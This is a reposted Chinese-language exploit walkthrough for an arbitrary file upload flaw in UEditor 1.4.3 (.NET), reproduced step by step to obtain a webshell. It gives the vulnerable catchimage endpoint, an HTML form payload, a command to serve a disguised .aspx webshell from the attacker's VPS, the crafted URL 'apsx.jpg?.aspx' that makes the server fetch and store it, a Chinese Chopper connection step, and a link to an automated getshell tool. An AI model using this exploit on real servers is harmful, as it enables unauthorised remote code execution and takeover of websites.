ueditor(v1.4.3)文件上傳getshell實戰復現

本文轉載自查看原文 2020-11-17 11:45 685 漏洞復現

漏洞存在點：

http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8

漏洞原因：controller.ashx文件下只校驗ContentType而沒校驗文件后綴導致getshell。

payload如下，並保存為html格式

<form action="http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"enctype="application/x-www-form-urlencoded" method="POST"> shell addr: <input type="text" name="source[]" />
 <input type="submit" value="Submit" />
</form>

在自己的VPS上啟動一個簡易的HTTP服務，並傳馬(可以不用圖片馬，直接改后綴名為jpg)

python -m SimpleHTTPServer 80

訪問自己的VPS即可看見服務已經啟動。

打開上面含payload的html文件

然后文本框中添加下面的鏈接，X.X.X.X是VPS地址

http://X.X.X.X/apsx.jpg?.aspx

點擊提交

菜刀連接

服務器這邊的記錄

另外附上GETSHELL的工具：https://github.com/theLSA/ueditor-getshell

還附上最近大佬的分析鏈接：https://xz.aliyun.com/t/8488

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 UEditor 1.4.3 任意文件上傳getshell Ueditor 1.4.3 單獨調用上傳圖片,或文件功能 UEditor上傳漏洞復現 UEditor1.4.3實現跨域上傳到獨立文件服務器，完美解決單文件和多文件上傳！ Ueditor1.4.3上傳視頻IE下無法播放的問題 SpringMVC Ueditor1.4.3 未找到上傳數據 GetShell總結--文件上傳 3.13通達OA文件上傳+包含getshell復現分析極致CMS兩處漏洞復現/存儲xss/文件上傳Getshell CKFinder 1.4.3 任意文件上傳漏洞